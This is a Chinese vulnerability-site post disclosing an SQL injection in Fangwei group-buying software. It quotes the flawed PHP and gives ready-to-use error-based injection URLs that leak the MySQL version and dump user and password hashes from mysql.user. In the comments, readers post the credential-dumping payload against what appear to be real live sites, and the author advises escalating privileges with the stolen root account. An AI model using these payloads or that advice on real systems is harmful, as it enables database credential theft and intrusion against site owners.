漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

方维团购4.3最新版sql注入通杀4.2

\\app\source\goods_list.php
[php]
//团购分类
$sidegoodscatelist = getGoodsCate(" and pid=0 ");
$catepid = 0;//分类ID
$pid = 0;//顶级分类ID
$sub_cate_list = array();//次级分类
$is_top_cate = 0;//是否是顶级分类
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
$catepid = $_REQUEST['id']; //用来获取接收的参数id
foreach($sidegoodscatelist as $k => $v){
if($v['id']==$catepid)
{
$is_top_cate=1;
}
}

if($is_top_cate==0)
{
$sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid));
//执行了select pid from " . DB_PREFIX . "goods_cate where id=."$_REQUEST['id']"
//导致了注入的发生
foreach($sub_cate_list as $kk => $vv)
{
if($vv['id']==$catepid)
{
$pid = $vv['pid'];
}
}
}
else
{
$sub_cate_list = getGoodsCate(" and pid=".$catepid);
$pid = $_REQUEST['id'];
}
}
$GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS['tpl']->assign('catepid',$catepid);
$GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list);
$GLOBALS['tpl']->assign('is_top_cate',$is_top_cate);
$GLOBALS['tpl']->assign('pid',$pid);
//end团购分类
[/php]
可以看到
[php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php]
假如m=goods,a=showcate并且传递的id值不为空
[php]$catepid = $_REQUEST['id'];[/php] //用来获取接收的参数id

再带入sql语句
[php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php]
导致了注入的发生
1
exp:
1.判断mysql版本
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

3
2.获取mysql账号密码
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]
2

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 方维团购4.3最新版sql注入通杀4.2

评论 16

  1. 感谢 辛苦整理这么多资料 简洁全面

    爆笑笑话 2014-11-13    回复
  2. 应该是某37哪里的吧

    Ray 2014-07-17    回复
  3. 老大能否写一个弄帐号密码的exp 你的我不会改

    小菜鸟 2014-07-15    回复
    • 动下脑子有助于学习

      0day5 2014-07-21    回复
  4. 难道不能爆后台密码?哪有这么多root

    shy 2014-07-14    回复
    • 能啊,这里只是举例子

      0day5 2014-07-21    回复
  5. 话说爆出来的MYSQL密码怎么是41位的

    adsf 2014-07-13    回复
    • 你仔细看图,有一个数字是多余的

      0day5 2014-07-21    回复
    • 。。。。。。。。。。

      0day5 2014-07-13    回复
  6. http://tg.np5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    神速小白 2014-07-11    回复
    • 这个...只是提供那啥,别做非法用途

      0day5 2014-07-11    回复
  7. http://qianrengou.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    神速小白 2014-07-11    回复
    • 这个...只是提供那啥,别做非法用途

      0day5 2014-07-11    回复
      • :razz:爆出来的root 怎么用

        asdfg 2014-07-20    回复
        • 如果可以外连,或者是有phpmyadmin的可以尝试提权

          0day5 2014-07-21    回复